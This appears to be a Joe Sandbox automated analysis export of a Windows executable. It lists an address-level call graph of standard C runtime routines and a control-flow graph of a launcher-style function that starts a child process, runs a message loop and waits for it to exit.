7ff6f0bf6314 19049->19364 19050->19054 19055 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 19051->19055 19054->18887 19055->19054 19057 7ff6f0be4f78 _get_daylight 11 API calls 19057->19054 19059 7ff6f0bf346e 19058->19059 19060 7ff6f0bf348b 19058->19060 19059->19060 19061 7ff6f0bf347c 19059->19061 19062 7ff6f0bf3495 19060->19062 19413 7ff6f0bf7ca8 19060->19413 19063 7ff6f0be4f78 _get_daylight 11 API calls 19061->19063 19420 7ff6f0bf7ce4 19062->19420 19066 7ff6f0bf3481 __scrt_get_show_window_mode 19063->19066 19066->18912 19068 7ff6f0be4fbc 45 API calls 19067->19068 19069 7ff6f0bf731a 19068->19069 19070 7ff6f0bf7328 19069->19070 19432 7ff6f0beef94 19069->19432 19435 7ff6f0be551c 19070->19435 19074 7ff6f0bf7414 19077 7ff6f0bf7425 19074->19077 19078 7ff6f0bea9b8 __free_lconv_num 11 API calls 19074->19078 19075 7ff6f0be4fbc 45 API calls 19076 7ff6f0bf7397 19075->19076 19081 7ff6f0beef94 5 API calls 19076->19081 19084 7ff6f0bf73a0 19076->19084 19079 7ff6f0bf0c13 19077->19079 19080 7ff6f0bea9b8 __free_lconv_num 11 API calls 19077->19080 19078->19077 19079->18930 19079->18931 19080->19079 19081->19084 19082 7ff6f0be551c 14 API calls 19083 7ff6f0bf73fb 19082->19083 19083->19074 19085 7ff6f0bf7403 SetEnvironmentVariableW 19083->19085 19084->19082 19085->19074 19087 7ff6f0bf10ff 19086->19087 19088 7ff6f0bf111c 19086->19088 19087->18944 19089 7ff6f0beec08 _get_daylight 11 API calls 19088->19089 19096 7ff6f0bf1140 19089->19096 19090 7ff6f0bf11c4 19091 7ff6f0bea574 __CxxCallCatchBlock 45 API calls 19090->19091 19093 7ff6f0bf11ca 19091->19093 19092 7ff6f0bf11a1 19094 7ff6f0bea9b8 __free_lconv_num 11 API calls 19092->19094 19094->19087 19095 7ff6f0beec08 _get_daylight 11 API calls 19095->19096 19096->19090 19096->19092 19096->19095 19097 7ff6f0bea9b8 __free_lconv_num 11 API calls 19096->19097 19098 7ff6f0bf04e4 37 API calls 19096->19098 19099 7ff6f0bf11b0 19096->19099 19097->19096 19098->19096 19100 7ff6f0bea970 _isindst 17 API calls 19099->19100 19100->19090 19102 7ff6f0be977c 19101->19102 19105 7ff6f0be9785 19101->19105 19102->19105 19457 7ff6f0be927c 19102->19457 19105->18960 19105->18961 19108 7ff6f0bf7069 19107->19108 19112 7ff6f0bf7096 19107->19112 19109 7ff6f0bf706e 19108->19109 19108->19112 19110 7ff6f0be4f78 _get_daylight 11 API calls 19109->19110 19111 7ff6f0bf7073 19110->19111 19114 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 19111->19114 19113 7ff6f0bf70da 19112->19113 19115 7ff6f0bf70f9 19112->19115 19129 7ff6f0bf70ce __crtLCMapStringW 19112->19129 19116 7ff6f0be4f78 _get_daylight 11 API calls 19113->19116 19118 7ff6f0bf707e 19114->19118 19119 7ff6f0bf7115 19115->19119 19120 7ff6f0bf7103 19115->19120 19117 7ff6f0bf70df 19116->19117 19121 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 19117->19121 19118->18954 19123 7ff6f0be4fbc 45 API calls 19119->19123 19122 7ff6f0be4f78 _get_daylight 11 API calls 19120->19122 19121->19129 19124 7ff6f0bf7108 19122->19124 19125 7ff6f0bf7122 19123->19125 19126 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 19124->19126 19125->19129 19504 7ff6f0bf8b78 19125->19504 19126->19129 19129->18954 19130 7ff6f0be4f78 _get_daylight 11 API calls 19130->19129 19132 7ff6f0be9221 19131->19132 19133 7ff6f0be921d 19131->19133 19154 7ff6f0bf2660 19132->19154 19133->19018 19146 7ff6f0be955c 19133->19146 19138 7ff6f0be9233 19140 7ff6f0bea9b8 __free_lconv_num 11 API calls 19138->19140 19139 7ff6f0be923f 19180 7ff6f0be92ec 19139->19180 19140->19133 19143 7ff6f0bea9b8 __free_lconv_num 11 API calls 19144 7ff6f0be9266 19143->19144 19145 7ff6f0bea9b8 __free_lconv_num 11 API calls 19144->19145 19145->19133 19147 7ff6f0be9585 19146->19147 19153 7ff6f0be959e 19146->19153 19147->19018 19148 7ff6f0beec08 _get_daylight 11 API calls 19148->19153 19149 7ff6f0be962e 19151 7ff6f0bea9b8 __free_lconv_num 11 API calls 19149->19151 19150 7ff6f0bf0858 WideCharToMultiByte 19150->19153 19151->19147 19152 7ff6f0bea9b8 __free_lconv_num 11 API calls 19152->19153 19153->19147 19153->19148 19153->19149 19153->19150 19153->19152 19155 7ff6f0bf266d 19154->19155 19156 7ff6f0be9226 19154->19156 19199 7ff6f0beb294 19155->19199 19160 7ff6f0bf299c GetEnvironmentStringsW 19156->19160 19161 7ff6f0be922b 19160->19161 19162 7ff6f0bf29cc 19160->19162 19161->19138 19161->19139 19163 7ff6f0bf0858 WideCharToMultiByte 19162->19163 19164 7ff6f0bf2a1d 19163->19164 19165 7ff6f0bf2a24 FreeEnvironmentStringsW 19164->19165 19166 7ff6f0bed66c _fread_nolock 12 API calls 19164->19166 19165->19161 19167 7ff6f0bf2a37 19166->19167 19168 7ff6f0bf2a3f 19167->19168 19169 7ff6f0bf2a48 19167->19169 19170 7ff6f0bea9b8 __free_lconv_num 11 API calls 19168->19170 19171 7ff6f0bf0858 WideCharToMultiByte 19169->19171 19172 7ff6f0bf2a46 19170->19172 19173 7ff6f0bf2a6b 19171->19173 19172->19165 19174 7ff6f0bf2a6f 19173->19174 19175 7ff6f0bf2a79 19173->19175 19176 7ff6f0bea9b8 __free_lconv_num 11 API calls 19174->19176 19177 7ff6f0bea9b8 __free_lconv_num 11 API calls 19175->19177 19178 7ff6f0bf2a77 FreeEnvironmentStringsW 19176->19178 19177->19178 19178->19161 19181 7ff6f0be9311 19180->19181 19182 7ff6f0beec08 _get_daylight 11 API calls 19181->19182 19183 7ff6f0be9347 19182->19183 19186 7ff6f0be93c2 19183->19186 19188 7ff6f0beec08 _get_daylight 11 API calls 19183->19188 19189 7ff6f0be93b1 19183->19189 19190 7ff6f0bea514 __std_exception_copy 37 API calls 19183->19190 19193 7ff6f0be93e7 19183->19193 19196 7ff6f0bea9b8 __free_lconv_num 11 API calls 19183->19196 19197 7ff6f0be934f 19183->19197 19184 7ff6f0bea9b8 __free_lconv_num 11 API calls 19185 7ff6f0be9247 19184->19185 19185->19143 19187 7ff6f0bea9b8 __free_lconv_num 11 API calls 19186->19187 19187->19185 19188->19183 19358 7ff6f0be9518 19189->19358 19190->19183 19195 7ff6f0bea970 _isindst 17 API calls 19193->19195 19194 7ff6f0bea9b8 __free_lconv_num 11 API calls 19194->19197 19198 7ff6f0be93fa 19195->19198 19196->19183 19197->19184 19200 7ff6f0beb2a5 FlsGetValue 19199->19200 19201 7ff6f0beb2c0 FlsSetValue 19199->19201 19202 7ff6f0beb2b2 19200->19202 19204 7ff6f0beb2ba 19200->19204 19201->19202 19203 7ff6f0beb2cd 19201->19203 19205 7ff6f0bea574 __CxxCallCatchBlock 45 API calls 19202->19205 19207 7ff6f0beb2b8 19202->19207 19206 7ff6f0beec08 _get_daylight 11 API calls 19203->19206 19204->19201 19208 7ff6f0beb335 19205->19208 19209 7ff6f0beb2dc 19206->19209 19219 7ff6f0bf2334 19207->19219 19210 7ff6f0beb2fa FlsSetValue 19209->19210 19211 7ff6f0beb2ea FlsSetValue 19209->19211 19213 7ff6f0beb318 19210->19213 19214 7ff6f0beb306 FlsSetValue 19210->19214 19212 7ff6f0beb2f3 19211->19212 19215 7ff6f0bea9b8 __free_lconv_num 11 API calls 19212->19215 19216 7ff6f0beaf64 _get_daylight 11 API calls 19213->19216 19214->19212 19215->19202 19217 7ff6f0beb320 19216->19217 19218 7ff6f0bea9b8 __free_lconv_num 11 API calls 19217->19218 19218->19207 19242 7ff6f0bf25a4 19219->19242 19221 7ff6f0bf2369 19257 7ff6f0bf2034 19221->19257 19224 7ff6f0bed66c _fread_nolock 12 API calls 19225 7ff6f0bf2397 19224->19225 19226 7ff6f0bf239f 19225->19226 19229 7ff6f0bf23ae 19225->19229 19227 7ff6f0bea9b8 __free_lconv_num 11 API calls 19226->19227 19228 7ff6f0bf2386 19227->19228 19228->19156 19264 7ff6f0bf26dc 19229->19264 19232 7ff6f0bf24aa 19233 7ff6f0be4f78 _get_daylight 11 API calls 19232->19233 19235 7ff6f0bf24af 19233->19235 19234 7ff6f0bf2505 19237 7ff6f0bf256c 19234->19237 19275 7ff6f0bf1e64 19234->19275 19238 7ff6f0bea9b8 __free_lconv_num 11 API calls 19235->19238 19236 7ff6f0bf24c4 19236->19234 19239 7ff6f0bea9b8 __free_lconv_num 11 API calls 19236->19239 19241 7ff6f0bea9b8 __free_lconv_num 11 API calls 19237->19241 19238->19228 19239->19234 19241->19228 19243 7ff6f0bf25c7 19242->19243 19244 7ff6f0bf25d1 19243->19244 19290 7ff6f0bf0348 EnterCriticalSection 19243->19290 19247 7ff6f0bf2643 19244->19247 19249 7ff6f0bea574 __CxxCallCatchBlock 45 API calls 19244->19249 19247->19221 19251 7ff6f0bf265b 19249->19251 19253 7ff6f0bf26b2 19251->19253 19254 7ff6f0beb294 50 API calls 19251->19254 19253->19221 19255 7ff6f0bf269c 19254->19255 19256 7ff6f0bf2334 65 API calls 19255->19256 19256->19253 19258 7ff6f0be4fbc 45 API calls 19257->19258 19259 7ff6f0bf2048 19258->19259 19260 7ff6f0bf2054 GetOEMCP 19259->19260 19261 7ff6f0bf2066 19259->19261 19262 7ff6f0bf207b 19260->19262 19261->19262 19263 7ff6f0bf206b GetACP 19261->19263 19262->19224 19262->19228 19263->19262 19265 7ff6f0bf2034 47 API calls 19264->19265 19266 7ff6f0bf2709 19265->19266 19267 7ff6f0bf285f 19266->19267 19269 7ff6f0bf2746 IsValidCodePage 19266->19269 19274 7ff6f0bf2760 __scrt_get_show_window_mode 19266->19274 19268 7ff6f0bdc5c0 _log10_special 8 API calls 19267->19268 19270 7ff6f0bf24a1 19268->19270 19269->19267 19271 7ff6f0bf2757 19269->19271 19270->19232 19270->19236 19272 7ff6f0bf2786 GetCPInfo 19271->19272 19271->19274 19272->19267 19272->19274 19291 7ff6f0bf214c 19274->19291 19357 7ff6f0bf0348 EnterCriticalSection 19275->19357 19292 7ff6f0bf2189 GetCPInfo 19291->19292 19293 7ff6f0bf227f 19291->19293 19292->19293 19299 7ff6f0bf219c 19292->19299 19294 7ff6f0bdc5c0 _log10_special 8 API calls 19293->19294 19295 7ff6f0bf231e 19294->19295 19295->19267 19296 7ff6f0bf2eb0 48 API calls 19297 7ff6f0bf2213 19296->19297 19302 7ff6f0bf7bf4 19297->19302 19299->19296 19301 7ff6f0bf7bf4 54 API calls 19301->19293 19303 7ff6f0be4fbc 45 API calls 19302->19303 19304 7ff6f0bf7c19 19303->19304 19307 7ff6f0bf78c0 19304->19307 19308 7ff6f0bf7901 19307->19308 19309 7ff6f0bef910 _fread_nolock MultiByteToWideChar 19308->19309 19313 7ff6f0bf794b 19309->19313 19310 7ff6f0bf7bc9 19311 7ff6f0bdc5c0 _log10_special 8 API calls 19310->19311 19312 7ff6f0bf2246 19311->19312 19312->19301 19313->19310 19314 7ff6f0bed66c _fread_nolock 12 API calls 19313->19314 19315 7ff6f0bf7983 19313->19315 19326 7ff6f0bf7a81 19313->19326 19314->19315 19317 7ff6f0bef910 _fread_nolock MultiByteToWideChar 19315->19317 19315->19326 19316 7ff6f0bea9b8 __free_lconv_num 11 API calls 19316->19310 19318 7ff6f0bf79f6 19317->19318 19318->19326 19338 7ff6f0bef154 19318->19338 19321 7ff6f0bf7a41 19325 7ff6f0bef154 __crtLCMapStringW 6 API calls 19321->19325 19321->19326 19322 7ff6f0bf7b64 19322->19326 19327 7ff6f0bea9b8 __free_lconv_num 11 API calls 19322->19327 19323 7ff6f0bf7a92 19323->19322 19324 7ff6f0bed66c _fread_nolock 12 API calls 19323->19324 19328 7ff6f0bf7ab0 19323->19328 19324->19328 19325->19326 19326->19310 19326->19316 19327->19326 19328->19326 19329 7ff6f0bef154 __crtLCMapStringW 6 API calls 19328->19329 19330 7ff6f0bf7b30 19329->19330 19330->19322 19331 7ff6f0bf7b50 19330->19331 19332 7ff6f0bf7b66 19330->19332 19333 7ff6f0bf0858 WideCharToMultiByte 19331->19333 19334 7ff6f0bf0858 WideCharToMultiByte 19332->19334 19335 7ff6f0bf7b5e 19333->19335 19334->19335 19335->19322 19336 7ff6f0bf7b7e 19335->19336 19336->19326 19337 7ff6f0bea9b8 __free_lconv_num 11 API calls 19336->19337 19337->19326 19344 7ff6f0beed80 19338->19344 19341 7ff6f0bef19a 19341->19321 19341->19323 19341->19326 19343 7ff6f0bef203 LCMapStringW 19343->19341 19345 7ff6f0beeddd 19344->19345 19352 7ff6f0beedd8 __vcrt_InitializeCriticalSectionEx 19344->19352 19345->19341 19354 7ff6f0bef240 19345->19354 19346 7ff6f0beee0d LoadLibraryExW 19348 7ff6f0beeee2 19346->19348 19349 7ff6f0beee32 GetLastError 19346->19349 19347 7ff6f0beef02 GetProcAddress 19347->19345 19351 7ff6f0beef13 19347->19351 19348->19347 19350 7ff6f0beeef9 FreeLibrary 19348->19350 19349->19352 19350->19347 19351->19345 19352->19345 19352->19346 19352->19347 19353 7ff6f0beee6c LoadLibraryExW 19352->19353 19353->19348 19353->19352 19355 7ff6f0beed80 __crtLCMapStringW 5 API calls 19354->19355 19356 7ff6f0bef26e __crtLCMapStringW 19355->19356 19356->19343 19359 7ff6f0be951d 19358->19359 19360 7ff6f0be93b9 19358->19360 19361 7ff6f0be9546 19359->19361 19363 7ff6f0bea9b8 __free_lconv_num 11 API calls 19359->19363 19360->19194 19362 7ff6f0bea9b8 __free_lconv_num 11 API calls 19361->19362 19362->19360 19363->19359 19365 7ff6f0bf6331 19364->19365 19366 7ff6f0bf6348 19364->19366 19367 7ff6f0be4f78 _get_daylight 11 API calls 19365->19367 19366->19365 19369 7ff6f0bf6356 19366->19369 19368 7ff6f0bf6336 19367->19368 19370 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 19368->19370 19371 7ff6f0be4fbc 45 API calls 19369->19371 19372 7ff6f0bf6341 19369->19372 19370->19372 19371->19372 19372->19054 19374 7ff6f0be4fbc 45 API calls 19373->19374 19375 7ff6f0bf8fe1 19374->19375 19378 7ff6f0bf8c38 19375->19378 19382 7ff6f0bf8c86 19378->19382 19379 7ff6f0bdc5c0 _log10_special 8 API calls 19380 7ff6f0bf7275 19379->19380 19380->19054 19380->19057 19381 7ff6f0bf8d0d 19383 7ff6f0bef910 _fread_nolock MultiByteToWideChar 19381->19383 19387 7ff6f0bf8d11 19381->19387 19382->19381 19384 7ff6f0bf8cf8 GetCPInfo 19382->19384 19382->19387 19385 7ff6f0bf8da5 19383->19385 19384->19381 19384->19387 19386 7ff6f0bed66c _fread_nolock 12 API calls 19385->19386 19385->19387 19388 7ff6f0bf8ddc 19385->19388 19386->19388 19387->19379 19388->19387 19389 7ff6f0bef910 _fread_nolock MultiByteToWideChar 19388->19389 19390 7ff6f0bf8e4a 19389->19390 19391 7ff6f0bf8f2c 19390->19391 19392 7ff6f0bef910 _fread_nolock MultiByteToWideChar 19390->19392 19391->19387 19393 7ff6f0bea9b8 __free_lconv_num 11 API calls 19391->19393 19394 7ff6f0bf8e70 19392->19394 19393->19387 19394->19391 19395 7ff6f0bed66c _fread_nolock 12 API calls 19394->19395 19396 7ff6f0bf8e9d 19394->19396 19395->19396 19396->19391 19397 7ff6f0bef910 _fread_nolock MultiByteToWideChar 19396->19397 19398 7ff6f0bf8f14 19397->19398 19399 7ff6f0bf8f34 19398->19399 19400 7ff6f0bf8f1a 19398->19400 19407 7ff6f0beefd8 19399->19407 19400->19391 19402 7ff6f0bea9b8 __free_lconv_num 11 API calls 19400->19402 19402->19391 19404 7ff6f0bf8f73 19404->19387 19406 7ff6f0bea9b8 __free_lconv_num 11 API calls 19404->19406 19405 7ff6f0bea9b8 __free_lconv_num 11 API calls 19405->19404 19406->19387 19408 7ff6f0beed80 __crtLCMapStringW 5 API calls 19407->19408 19409 7ff6f0bef016 19408->19409 19410 7ff6f0bef240 __crtLCMapStringW 5 API calls 19409->19410 19412 7ff6f0bef01e 19409->19412 19411 7ff6f0bef087 CompareStringW 19410->19411 19411->19412 19412->19404 19412->19405 19414 7ff6f0bf7cb1 19413->19414 19415 7ff6f0bf7cca HeapSize 19413->19415 19416 7ff6f0be4f78 _get_daylight 11 API calls 19414->19416 19417 7ff6f0bf7cb6 19416->19417 19418 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 19417->19418 19419 7ff6f0bf7cc1 19418->19419 19419->19062 19421 7ff6f0bf7d03 19420->19421 19422 7ff6f0bf7cf9 19420->19422 19424 7ff6f0bf7d08 19421->19424 19430 7ff6f0bf7d0f _get_daylight 19421->19430 19423 7ff6f0bed66c _fread_nolock 12 API calls 19422->19423 19429 7ff6f0bf7d01 19423->19429 19425 7ff6f0bea9b8 __free_lconv_num 11 API calls 19424->19425 19425->19429 19426 7ff6f0bf7d15 19428 7ff6f0be4f78 _get_daylight 11 API calls 19426->19428 19427 7ff6f0bf7d42 HeapReAlloc 19427->19429 19427->19430 19428->19429 19429->19066 19430->19426 19430->19427 19431 7ff6f0bf3600 _get_daylight 2 API calls 19430->19431 19431->19430 19433 7ff6f0beed80 __crtLCMapStringW 5 API calls 19432->19433 19434 7ff6f0beefb4 19433->19434 19434->19070 19436 7ff6f0be556a 19435->19436 19437 7ff6f0be5546 19435->19437 19438 7ff6f0be55c4 19436->19438 19439 7ff6f0be556f 19436->19439 19441 7ff6f0bea9b8 __free_lconv_num 11 API calls 19437->19441 19445 7ff6f0be5555 19437->19445 19440 7ff6f0bef910 _fread_nolock MultiByteToWideChar 19438->19440 19442 7ff6f0be5584 19439->19442 19439->19445 19446 7ff6f0bea9b8 __free_lconv_num 11 API calls 19439->19446 19451 7ff6f0be55e0 19440->19451 19441->19445 19443 7ff6f0bed66c _fread_nolock 12 API calls 19442->19443 19443->19445 19444 7ff6f0be55e7 GetLastError 19447 7ff6f0be4eec _fread_nolock 11 API calls 19444->19447 19445->19074 19445->19075 19446->19442 19450 7ff6f0be55f4 19447->19450 19448 7ff6f0be5622 19448->19445 19449 7ff6f0bef910 _fread_nolock MultiByteToWideChar 19448->19449 19455 7ff6f0be5666 19449->19455 19456 7ff6f0be4f78 _get_daylight 11 API calls 19450->19456 19451->19444 19451->19448 19452 7ff6f0be5615 19451->19452 19453 7ff6f0bea9b8 __free_lconv_num 11 API calls 19451->19453 19454 7ff6f0bed66c _fread_nolock 12 API calls 19452->19454 19453->19452 19454->19448 19455->19444 19455->19445 19456->19445 19458 7ff6f0be9295 19457->19458 19469 7ff6f0be9291 19457->19469 19478 7ff6f0bf2aac GetEnvironmentStringsW 19458->19478 19461 7ff6f0be92a2 19464 7ff6f0bea9b8 __free_lconv_num 11 API calls 19461->19464 19462 7ff6f0be92ae 19485 7ff6f0be93fc 19462->19485 19464->19469 19466 7ff6f0bea9b8 __free_lconv_num 11 API calls 19467 7ff6f0be92d5 19466->19467 19468 7ff6f0bea9b8 __free_lconv_num 11 API calls 19467->19468 19468->19469 19469->19105 19470 7ff6f0be963c 19469->19470 19475 7ff6f0be965f 19470->19475 19476 7ff6f0be9676 19470->19476 19471 7ff6f0bef910 MultiByteToWideChar _fread_nolock 19471->19476 19472 7ff6f0beec08 _get_daylight 11 API calls 19472->19476 19473 7ff6f0be96ea 19474 7ff6f0bea9b8 __free_lconv_num 11 API calls 19473->19474 19474->19475 19475->19105 19476->19471 19476->19472 19476->19473 19476->19475 19477 7ff6f0bea9b8 __free_lconv_num 11 API calls 19476->19477 19477->19476 19479 7ff6f0be929a 19478->19479 19480 7ff6f0bf2ad0 19478->19480 19479->19461 19479->19462 19481 7ff6f0bed66c _fread_nolock 12 API calls 19480->19481 19484 7ff6f0bf2b07 memcpy_s 19481->19484 19482 7ff6f0bea9b8 __free_lconv_num 11 API calls 19483 7ff6f0bf2b27 FreeEnvironmentStringsW 19482->19483 19483->19479 19484->19482 19486 7ff6f0be9424 19485->19486 19487 7ff6f0beec08 _get_daylight 11 API calls 19486->19487 19500 7ff6f0be945f 19487->19500 19488 7ff6f0be9467 19489 7ff6f0bea9b8 __free_lconv_num 11 API calls 19488->19489 19491 7ff6f0be92b6 19489->19491 19490 7ff6f0be94e1 19492 7ff6f0bea9b8 __free_lconv_num 11 API calls 19490->19492 19491->19466 19492->19491 19493 7ff6f0beec08 _get_daylight 11 API calls 19493->19500 19494 7ff6f0be94d0 19496 7ff6f0be9518 11 API calls 19494->19496 19495 7ff6f0bf04e4 37 API calls 19495->19500 19497 7ff6f0be94d8 19496->19497 19498 7ff6f0bea9b8 __free_lconv_num 11 API calls 19497->19498 19498->19488 19499 7ff6f0be9504 19501 7ff6f0bea970 _isindst 17 API calls 19499->19501 19500->19488 19500->19490 19500->19493 19500->19494 19500->19495 19500->19499 19502 7ff6f0bea9b8 __free_lconv_num 11 API calls 19500->19502 19503 7ff6f0be9516 19501->19503 19502->19500 19505 7ff6f0bf8ba1 __crtLCMapStringW 19504->19505 19506 7ff6f0bf715e 19505->19506 19507 7ff6f0beefd8 6 API calls 19505->19507 19506->19129 19506->19130 19507->19506 20755 7ff6f0bfac53 20756 7ff6f0bfac63 20755->20756 20759 7ff6f0be54e8 LeaveCriticalSection 20756->20759 16038 7ff6f0be99d1 16050 7ff6f0bea448 16038->16050 16055 7ff6f0beb1c0 GetLastError 16050->16055 16056 7ff6f0beb1e4 FlsGetValue 16055->16056 16057 7ff6f0beb201 FlsSetValue 16055->16057 16059 7ff6f0beb1f1 SetLastError 16056->16059 16060 7ff6f0beb1fb 16056->16060 16058 7ff6f0beb213 16057->16058 16057->16059 16086 7ff6f0beec08 16058->16086 16063 7ff6f0beb28d 16059->16063 16064 7ff6f0bea451 16059->16064 16060->16057 16066 7ff6f0bea574 __CxxCallCatchBlock 38 API calls 16063->16066 16077 7ff6f0bea574 16064->16077 16069 7ff6f0beb292 16066->16069 16067 7ff6f0beb240 FlsSetValue 16071 7ff6f0beb25e 16067->16071 16072 7ff6f0beb24c FlsSetValue 16067->16072 16068 7ff6f0beb230 FlsSetValue 16070 7ff6f0beb239 16068->16070 16095 7ff6f0bea9b8 16070->16095 16101 7ff6f0beaf64 16071->16101 16072->16070 16149 7ff6f0bf36c0 16077->16149 16087 7ff6f0beec19 16086->16087 16088 7ff6f0beec27 _get_daylight 16086->16088 16087->16088 16090 7ff6f0beec6a 16087->16090 16089 7ff6f0beec4e HeapAlloc 16088->16089 16088->16090 16106 7ff6f0bf3600 16088->16106 16089->16088 16091 7ff6f0beec68 16089->16091 16109 7ff6f0be4f78 16090->16109 16093 7ff6f0beb222 16091->16093 16093->16067 16093->16068 16096 7ff6f0bea9ec 16095->16096 16097 7ff6f0bea9bd RtlFreeHeap 16095->16097 16096->16059 16097->16096 16098 7ff6f0bea9d8 GetLastError 16097->16098 16099 7ff6f0bea9e5 __free_lconv_num 16098->16099 16100 7ff6f0be4f78 _get_daylight 9 API calls 16099->16100 16100->16096 16135 7ff6f0beae3c 16101->16135 16112 7ff6f0bf3640 16106->16112 16118 7ff6f0beb338 GetLastError 16109->16118 16111 7ff6f0be4f81 16111->16093 16117 7ff6f0bf0348 EnterCriticalSection 16112->16117 16119 7ff6f0beb379 FlsSetValue 16118->16119 16123 7ff6f0beb35c 16118->16123 16120 7ff6f0beb38b 16119->16120 16124 7ff6f0beb369 16119->16124 16122 7ff6f0beec08 _get_daylight 5 API calls 16120->16122 16121 7ff6f0beb3e5 SetLastError 16121->16111 16125 7ff6f0beb39a 16122->16125 16123->16119 16123->16124 16124->16121 16126 7ff6f0beb3b8 FlsSetValue 16125->16126 16127 7ff6f0beb3a8 FlsSetValue 16125->16127 16129 7ff6f0beb3c4 FlsSetValue 16126->16129 16130 7ff6f0beb3d6 16126->16130 16128 7ff6f0beb3b1 16127->16128 16131 7ff6f0bea9b8 __free_lconv_num 5 API calls 16128->16131 16129->16128 16132 7ff6f0beaf64 _get_daylight 5 API calls 16130->16132 16131->16124 16133 7ff6f0beb3de 16132->16133 16134 7ff6f0bea9b8 __free_lconv_num 5 API calls 16133->16134 16134->16121 16147 7ff6f0bf0348 EnterCriticalSection 16135->16147 16183 7ff6f0bf3678 16149->16183 16188 7ff6f0bf0348 EnterCriticalSection 16183->16188 16253 7ff6f0bdbb50 16254 7ff6f0bdbb7e 16253->16254 16255 7ff6f0bdbb65 16253->16255 16255->16254 16258 7ff6f0bed66c 16255->16258 16259 7ff6f0bed6b7 16258->16259 16263 7ff6f0bed67b _get_daylight 16258->16263 16261 7ff6f0be4f78 _get_daylight 11 API calls 16259->16261 16260 7ff6f0bed69e HeapAlloc 16262 7ff6f0bdbbde 16260->16262 16260->16263 16261->16262 16263->16259 16263->16260 16264 7ff6f0bf3600 _get_daylight 2 API calls 16263->16264 16264->16263 19964 7ff6f0bfadd9 19967 7ff6f0be54e8 LeaveCriticalSection 19964->19967 20765 7ff6f0bfae6e 20766 7ff6f0bfae7d 20765->20766 20767 7ff6f0bfae87 20765->20767 20769 7ff6f0bf03a8 LeaveCriticalSection 20766->20769

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 0 7ff6f0bd8bd0-7ff6f0bd8d16 call 7ff6f0bdc8c0 call 7ff6f0bd9400 SetConsoleCtrlHandler GetStartupInfoW call 7ff6f0be5460 call 7ff6f0bea4ec call 7ff6f0be878c call 7ff6f0be5460 call 7ff6f0bea4ec call 7ff6f0be878c call 7ff6f0be5460 call 7ff6f0bea4ec call 7ff6f0be878c GetCommandLineW CreateProcessW 23 7ff6f0bd8d3d-7ff6f0bd8d79 RegisterClassW 0->23 24 7ff6f0bd8d18-7ff6f0bd8d38 GetLastError call 7ff6f0bd2c50 0->24 26 7ff6f0bd8d81-7ff6f0bd8dd5 CreateWindowExW 23->26 27 7ff6f0bd8d7b GetLastError 23->27 31 7ff6f0bd9029-7ff6f0bd904f call 7ff6f0bdc5c0 24->31 29 7ff6f0bd8ddf-7ff6f0bd8de4 ShowWindow 26->29 30 7ff6f0bd8dd7-7ff6f0bd8ddd GetLastError 26->30 27->26 32 7ff6f0bd8dea-7ff6f0bd8dfa WaitForSingleObject 29->32 30->32 34 7ff6f0bd8dfc 32->34 35 7ff6f0bd8e78-7ff6f0bd8e7f 32->35 36 7ff6f0bd8e00-7ff6f0bd8e03 34->36 37 7ff6f0bd8ec2-7ff6f0bd8ec9 35->37 38 7ff6f0bd8e81-7ff6f0bd8e91 WaitForSingleObject 35->38 40 7ff6f0bd8e05 GetLastError 36->40 41 7ff6f0bd8e0b-7ff6f0bd8e12 36->41 44 7ff6f0bd8ecf-7ff6f0bd8ee5 QueryPerformanceFrequency QueryPerformanceCounter 37->44 45 7ff6f0bd8fb0-7ff6f0bd8fc9 GetMessageW 37->45 42 7ff6f0bd8e97-7ff6f0bd8ea7 TerminateProcess 38->42 43 7ff6f0bd8fe8-7ff6f0bd8ff2 38->43 40->41 41->38 46 7ff6f0bd8e14-7ff6f0bd8e31 PeekMessageW 41->46 51 7ff6f0bd8eaf-7ff6f0bd8ebd WaitForSingleObject 42->51 52 7ff6f0bd8ea9 GetLastError 42->52 49 7ff6f0bd8ff4-7ff6f0bd8ffa DestroyWindow 43->49 50 7ff6f0bd9001-7ff6f0bd9025 GetExitCodeProcess CloseHandle * 2 43->50 53 7ff6f0bd8ef0-7ff6f0bd8f28 MsgWaitForMultipleObjects PeekMessageW 44->53 47 7ff6f0bd8fdf-7ff6f0bd8fe6 45->47 48 7ff6f0bd8fcb-7ff6f0bd8fd9 TranslateMessage DispatchMessageW 45->48 54 7ff6f0bd8e33-7ff6f0bd8e64 TranslateMessage DispatchMessageW PeekMessageW 46->54 55 7ff6f0bd8e66-7ff6f0bd8e76 WaitForSingleObject 46->55 47->43 47->45 48->47 49->50 50->31 51->43 52->51 56 7ff6f0bd8f63-7ff6f0bd8f6a 53->56 57 7ff6f0bd8f2a 53->57 54->54 54->55 55->35 55->36 56->45 58 7ff6f0bd8f6c-7ff6f0bd8f95 QueryPerformanceCounter 56->58 59 7ff6f0bd8f30-7ff6f0bd8f61 TranslateMessage DispatchMessageW PeekMessageW 57->59 58->53 60 7ff6f0bd8f9b-7ff6f0bd8fa2 58->60 59->56 59->59 60->43 61 7ff6f0bd8fa4-7ff6f0bd8fa8 60->61 61->45
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
